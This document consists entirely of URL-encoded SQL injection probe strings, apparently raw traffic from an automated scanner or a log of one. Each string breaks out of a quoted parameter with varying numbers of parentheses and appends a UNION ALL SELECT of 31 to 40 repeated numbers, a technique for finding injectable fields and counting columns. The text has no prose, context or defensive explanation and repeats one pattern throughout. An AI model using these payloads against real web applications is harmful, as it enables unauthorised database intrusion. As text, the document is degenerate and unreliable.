-1693%27%29%29%29%20UNION%20ALL%20SELECT%205593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%2C5593%23 -7932%27%29%29%29%20UNION%20ALL%20SELECT%203037%2C3037%2C3037%2C3037%2C3037%2C3037%2C3037%2C3037%2C3037%2C3037%2C3037%2C3037%2C3037%2C3037%2C3037%2C3037%2C3037%2C3037%2C3037%2C3037%2C3037%2C3037%2C3037%2C3037%2C3037%2C3037%2C3037%2C3037%2C3037%2C3037%2C3037%2C3037%2C3037%2C3037%2C3037%2C3037%2C3037%23 -2561%27%29%29%29%20UNION%20ALL%20SELECT%207616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%2C7616%23 -9764%27%29%29%29%20UNION%20ALL%20SELECT%204755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%2C4755%23 -9977%27%29%29%29%20UNION%20ALL%20SELECT%209872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%2C9872%23 -3988%27%20UNION%20ALL%20SELECT%202853%2C2853%2C2853%2C2853%2C2853%2C2853%2C2853%2C2853%2C2853%2C2853%2C2853%2C2853%2C2853%2C2853%2C2853%2C2853%2C2853%2C2853%2C2853%2C2853%2C2853%2C2853%2C2853%2C2853%2C2853%2C2853%2C2853%2C2853%2C2853%2C2853%2C2853%23 -2992%27%20UNION%20ALL%20SELECT%204480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%2C4480%23 -2814%27%20UNION%20ALL%20SELECT%203078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%2C3078%23 -6956%27%20UNION%20ALL%20SELECT%209472%2C9472%2C9472%2C9472%2C9472%2C9472%2C9472%2C9472%2C9472%2C9472%2C9472%2C9472%2C9472%2C9472%2C9472%2C9472%2C9472%2C9472%2C9472%2C9472%2C9472%2C9472%2C9472%2C9472%2C9472%2C9472%2C9472%2C9472%2C9472%2C9472%2C9472%2C9472%2C9472%2C9472%23 -8793%27%20UNION%20ALL%20SELECT%208620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%2C8620%23 -4102%27%20UNION%20ALL%20SELECT%202274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%2C2274%23 -6957%27%20UNION%20ALL%20SELECT%208487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%2C8487%23 -6136%27%20UNION%20ALL%20SELECT%208084%2C8084%2C8084%2C8084%2C8084%2C8084%2C8084%2C8084%2C8084%2C8084%2C8084%2C8084%2C8084%2C8084%2C8084%2C8084%2C8084%2C8084%2C8084%2C8084%2C8084%2C8084%2C8084%2C8084%2C8084%2C8084%2C8084%2C8084%2C8084%2C8084%2C8084%2C8084%2C8084%2C8084%2C8084%2C8084%2C8084%2C8084%23 -6709%27%20UNION%20ALL%20SELECT%205166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%2C5166%23 -9496%27%20UNION%20ALL%20SELECT%206161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%2C6161%23 -5321%22%29%20UNION%20ALL%20SELECT%205957%2C5957%2C5957%2C5957%2C5957%2C5957%2C5957%2C5957%2C5957%2C5957%2C5957%2C5957%2C5957%2C5957%2C5957%2C5957%2C5957%2C5957%2C5957%2C5957%2C5957%2C5957%2C5957%2C5957%2C5957%2C5957%2C5957%2C5957%2C5957%2C5957%2C5957%23 -7749%22%29%20UNION%20ALL%20SELECT%207621%2C7621%2C7621%2C7621%2C7621%2C7621%2C7621%2C7621%2C7621%2C7621%2C7621%2C7621%2C7621%2C7621%2C7621%2C7621%2C7621%2C7621%2C7621%2C7621%2C7621%2C7621%2C7621%2C7621%2C7621%2C7621%2C7621%2C7621%2C7621%2C7621%2C7621%2C7621%23 -7154%22%29%20UNION%20ALL%20SELECT%207891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%2C7891%23 -3877%22%29%20UNION%20ALL%20SELECT%203215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%2C3215%23 -3617%22%29%20UNION%20ALL%20SELECT%202471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%2C2471%23 -2332%22%29%20UNION%20ALL%20SELECT%203509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%2C3509%23 -1937%22%29%20UNION%20ALL%20SELECT%203195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%2C3195%23 -7007%22%29%20UNION%20ALL%20SELECT%201757%2C1757%2C1757%2C1757%2C1757%2C1757%2C1757%2C1757%2C1757%2C1757%2C1757%2C1757%2C1757%2C1757%2C1757%2C1757%2C1757%2C1757%2C1757%2C1757%2C1757%2C1757%2C1757%2C1757%2C1757%2C1757%2C1757%2C1757%2C1757%2C1757%2C1757%2C1757%2C1757%2C1757%2C1757%2C1757%2C1757%2C1757%23 -7506%22%29%20UNION%20ALL%20SELECT%208577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%2C8577%23 -5490%22%29%20UNION%20ALL%20SELECT%206393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%2C6393%23 -1265%22%29%29%20UNION%20ALL%20SELECT%201504%2C1504%2C1504%2C1504%2C1504%2C1504%2C1504%2C1504%2C1504%2C1504%2C1504%2C1504%2C1504%2C1504%2C1504%2C1504%2C1504%2C1504%2C1504%2C1504%2C1504%2C1504%2C1504%2C1504%2C1504%2C1504%2C1504%2C1504%2C1504%2C1504%2C1504%23 -2601%22%29%29%20UNION%20ALL%20SELECT%207799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%2C7799%23 -1505%22%29%29%20UNION%20ALL%20SELECT%207298%2C7298%2C7298%2C7298%2C7298%2C7298%2C7298%2C7298%2C7298%2C7298%2C7298%2C7298%2C7298%2C7298%2C7298%2C7298%2C7298%2C7298%2C7298%2C7298%2C7298%2C7298%2C7298%2C7298%2C7298%2C7298%2C7298%2C7298%2C7298%2C7298%2C7298%2C7298%2C7298%23 -5129%22%29%29%20UNION%20ALL%20SELECT%205514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%2C5514%23 -9626%22%29%29%20UNION%20ALL%20SELECT%209907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%2C9907%23 -1008%22%29%29%20UNION%20ALL%20SELECT%207312%2C7312%2C7312%2C7312%2C7312%2C7312%2C7312%2C7312%2C7312%2C7312%2C7312%2C7312%2C7312%2C7312%2C7312%2C7312%2C7312%2C7312%2C7312%2C7312%2C7312%2C7312%2C7312%2C7312%2C7312%2C7312%2C7312%2C7312%2C7312%2C7312%2C7312%2C7312%2C7312%2C7312%2C7312%2C7312%23 -5785%22%29%29%20UNION%20ALL%20SELECT%202825%2C2825%2C2825%2C2825%2C2825%2C2825%2C2825%2C2825%2C2825%2C2825%2C2825%2C2825%2C2825%2C2825%2C2825%2C2825%2C2825%2C2825%2C2825%2C2825%2C2825%2C2825%2C2825%2C2825%2C2825%2C2825%2C2825%2C2825%2C2825%2C2825%2C2825%2C2825%2C2825%2C2825%2C2825%2C2825%2C2825%23 -9995%22%29%29%20UNION%20ALL%20SELECT%209263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%2C9263%23 -7990%22%29%29%20UNION%20ALL%20SELECT%206199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%2C6199%23 -5540%22%29%29%20UNION%20ALL%20SELECT%205376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%2C5376%23 -6221%22%29%29%29%20UNION%20ALL%20SELECT%201286%2C1286%2C1286%2C1286%2C1286%2C1286%2C1286%2C1286%2C1286%2C1286%2C1286%2C1286%2C1286%2C1286%2C1286%2C1286%2C1286%2C1286%2C1286%2C1286%2C1286%2C1286%2C1286%2C1286%2C1286%2C1286%2C1286%2C1286%2C1286%2C1286%2C1286%23 -8976%22%29%29%29%20UNION%20ALL%20SELECT%205978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%2C5978%23 -2919%22%29%29%29%20UNION%20ALL%20SELECT%202085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%2C2085%23 -3393%22%29%29%29%20UNION%20ALL%20SELECT%203300%2C3300%2C3300%2C3300%2C3300%2C3300%2C3300%2C3300%2C3300%2C3300%2C3300%2C3300%2C3300%2C3300%2C3300%2C3300%2C3300%2C3300%2C3300%2C3300%2C3300%2C3300%2C3300%2C3300%2C3300%2C3300%2C3300%2C3300%2C3300%2C3300%2C3300%2C3300%2C3300%2C3300%23 -2632%22%29%29%29%20UNION%20ALL%20SELECT%204037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%2C4037%23 -3726%22%29%29%29%20UNION%20ALL%20SELECT%205523%2C5523%2C5523%2C5523%2C5523%2C5523%2C5523%2C5523%2C5523%2C5523%2C5523%2C5523%2C5523%2C5523%2C5523%2C5523%2C5523%2C5523%2C5523%2C5523%2C5523%2C5523%2C5523%2C5523%2C5523%2C5523%2C5523%2C5523%2C5523%2C5523%2C5523%2C5523%2C5523%2C5523%2C5523%2C5523%23 -7329%22%29%29%29%20UNION%20ALL%20SELECT%201451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%2C1451%23 -9675%22%29%29%29%20UNION%20ALL%20SELECT%207320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%2C7320%23 -7869%22%29%29%29%20UNION%20ALL%20SELECT%208104%2C8104%2C8104%2C8104%2C8104%2C8104%2C8104%2C8104%2C8104%2C8104%2C8104%2C8104%2C8104%2C8104%2C8104%2C8104%2C8104%2C8104%2C8104%2C8104%2C8104%2C8104%2C8104%2C8104%2C8104%2C8104%2C8104%2C8104%2C8104%2C8104%2C8104%2C8104%2C8104%2C8104%2C8104%2C8104%2C8104%2C8104%2C8104%23 -7163%22%29%29%29%20UNION%20ALL%20SELECT%208178%2C8178%2C8178%2C8178%2C8178%2C8178%2C8178%2C8178%2C8178%2C8178%2C8178%2C8178%2C8178%2C8178%2C8178%2C8178%2C8178%2C8178%2C8178%2C8178%2C8178%2C8178%2C8178%2C8178%2C8178%2C8178%2C8178%2C8178%2C8178%2C8178%2C8178%2C8178%2C8178%2C8178%2C8178%2C8178%2C8178%2C8178%2C8178%2C8178%23 -5911%22%20UNION%20ALL%20SELECT%208876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%2C8876%23 -4567%22%20UNION%20ALL%20SELECT%201349%2C1349%2C1349%2C1349%2C1349%2C1349%2C1349%2C1349%2C1349%2C1349%2C1349%2C1349%2C1349%2C1349%2C1349%2C1349%2C1349%2C1349%2C1349%2C1349%2C1349%2C1349%2C1349%2C1349%2C1349%2C1349%2C1349%2C1349%2C1349%2C1349%2C1349%2C1349%23 -4709%22%20UNION%20ALL%20SELECT%201484%2C1484%2C1484%2C1484%2C1484%2C1484%2C1484%2C1484%2C1484%2C1484%2C1484%2C1484%2C1484%2C1484%2C1484%2C1484%2C1484%2C1484%2C1484%2C1484%2C1484%2C1484%2C1484%2C1484%2C1484%2C1484%2C1484%2C1484%2C1484%2C1484%2C1484%2C1484%2C1484%23 -8756%22%20UNION%20ALL%20SELECT%202728%2C2728%2C2728%2C2728%2C2728%2C2728%2C2728%2C2728%2C2728%2C2728%2C2728%2C2728%2C2728%2C2728%2C2728%2C2728%2C2728%2C2728%2C2728%2C2728%2C2728%2C2728%2C2728%2C2728%2C2728%2C2728%2C2728%2C2728%2C2728%2C2728%2C2728%2C2728%2C2728%2C2728%23 -7655%22%20UNION%20ALL%20SELECT%205588%2C5588%2C5588%2C5588%2C5588%2C5588%2C5588%2C5588%2C5588%2C5588%2C5588%2C5588%2C5588%2C5588%2C5588%2C5588%2C5588%2C5588%2C5588%2C5588%2C5588%2C5588%2C5588%2C5588%2C5588%2C5588%2C5588%2C5588%2C5588%2C5588%2C5588%2C5588%2C5588%2C5588%2C5588%23 -7282%22%20UNION%20ALL%20SELECT%204307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%2C4307%23 -6160%22%20UNION%20ALL%20SELECT%209544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%2C9544%23 -7034%22%20UNION%20ALL%20SELECT%207151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%2C7151%23 -2607%22%20UNION%20ALL%20SELECT%201532%2C1532%2C1532%2C1532%2C1532%2C1532%2C1532%2C1532%2C1532%2C1532%2C1532%2C1532%2C1532%2C1532%2C1532%2C1532%2C1532%2C1532%2C1532%2C1532%2C1532%2C1532%2C1532%2C1532%2C1532%2C1532%2C1532%2C1532%2C1532%2C1532%2C1532%2C1532%2C1532%2C1532%2C1532%2C1532%2C1532%2C1532%2C1532%23 -6658%22%20UNION%20ALL%20SELECT%202338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%2C2338%23 -1832%22%29%20UNION%20ALL%20SELECT%203708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%2C3708%23 -8298%22%29%20UNION%20ALL%20SELECT%207777%2C7777%2C7777%2C7777%2C7777%2C7777%2C7777%2C7777%2C7777%2C7777%2C7777%2C7777%2C7777%2C7777%2C7777%2C7777%2C7777%2C7777%2C7777%2C7777%2C7777%2C7777%2C7777%2C7777%2C7777%2C7777%2C7777%2C7777%2C7777%2C7777%2C7777%2C7777%23 -5905%22%29%20UNION%20ALL%20SELECT%209600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%2C9600%23 -5494%22%29%20UNION%20ALL%20SELECT%205659%2C5659%2C5659%2C5659%2C5659%2C5659%2C5659%2C5659%2C5659%2C5659%2C5659%2C5659%2C5659%2C5659%2C5659%2C5659%2C5659%2C5659%2C5659%2C5659%2C5659%2C5659%2C5659%2C5659%2C5659%2C5659%2C5659%2C5659%2C5659%2C5659%2C5659%2C5659%2C5659%2C5659%23 -7635%22%29%20UNION%20ALL%20SELECT%202218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%2C2218%23 -3056%22%29%20UNION%20ALL%20SELECT%206877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%2C6877%23 -1741%22%29%20UNION%20ALL%20SELECT%206701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%2C6701%23 -9170%22%29%20UNION%20ALL%20SELECT%206549%2C6549%2C6549%2C6549%2C6549%2C6549%2C6549%2C6549%2C6549%2C6549%2C6549%2C6549%2C6549%2C6549%2C6549%2C6549%2C6549%2C6549%2C6549%2C6549%2C6549%2C6549%2C6549%2C6549%2C6549%2C6549%2C6549%2C6549%2C6549%2C6549%2C6549%2C6549%2C6549%2C6549%2C6549%2C6549%2C6549%2C6549%23 -1198%22%29%20UNION%20ALL%20SELECT%207479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%23 -9102%22%29%20UNION%20ALL%20SELECT%204210%2C4210%2C4210%2C4210%2C4210%2C4210%2C4210%2C4210%2C4210%2C4210%2C4210%2C4210%2C4210%2C4210%2C4210%2C4210%2C4210%2C4210%2C4210%2C4210%2C4210%2C4210%2C4210%2C4210%2C4210%2C4210%2C4210%2C4210%2C4210%2C4210%2C4210%2C4210%2C4210%2C4210%2C4210%2C4210%2C4210%2C4210%2C4210%2C4210%23 -6545%22%29%29%20UNION%20ALL%20SELECT%208742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%2C8742%23 -2394%22%29%29%20UNION%20ALL%20SELECT%205528%2C5528%2C5528%2C5528%2C5528%2C5528%2C5528%2C5528%2C5528%2C5528%2C5528%2C5528%2C5528%2C5528%2C5528%2C5528%2C5528%2C5528%2C5528%2C5528%2C5528%2C5528%2C5528%2C5528%2C5528%2C5528%2C5528%2C5528%2C5528%2C5528%2C5528%2C5528%23 -8010%22%29%29%20UNION%20ALL%20SELECT%203093%2C3093%2C3093%2C3093%2C3093%2C3093%2C3093%2C3093%2C3093%2C3093%2C3093%2C3093%2C3093%2C3093%2C3093%2C3093%2C3093%2C3093%2C3093%2C3093%2C3093%2C3093%2C3093%2C3093%2C3093%2C3093%2C3093%2C3093%2C3093%2C3093%2C3093%2C3093%2C3093%23 -7643%22%29%29%20UNION%20ALL%20SELECT%206858%2C6858%2C6858%2C6858%2C6858%2C6858%2C6858%2C6858%2C6858%2C6858%2C6858%2C6858%2C6858%2C6858%2C6858%2C6858%2C6858%2C6858%2C6858%2C6858%2C6858%2C6858%2C6858%2C6858%2C6858%2C6858%2C6858%2C6858%2C6858%2C6858%2C6858%2C6858%2C6858%2C6858%23 -8123%22%29%29%20UNION%20ALL%20SELECT%206434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%2C6434%23 -8434%22%29%29%20UNION%20ALL%20SELECT%205740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%2C5740%23 -6312%22%29%29%20UNION%20ALL%20SELECT%206888%2C6888%2C6888%2C6888%2C6888%2C6888%2C6888%2C6888%2C6888%2C6888%2C6888%2C6888%2C6888%2C6888%2C6888%2C6888%2C6888%2C6888%2C6888%2C6888%2C6888%2C6888%2C6888%2C6888%2C6888%2C6888%2C6888%2C6888%2C6888%2C6888%2C6888%2C6888%2C6888%2C6888%2C6888%2C6888%2C6888%23 -8169%22%29%29%20UNION%20ALL%20SELECT%204523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%23 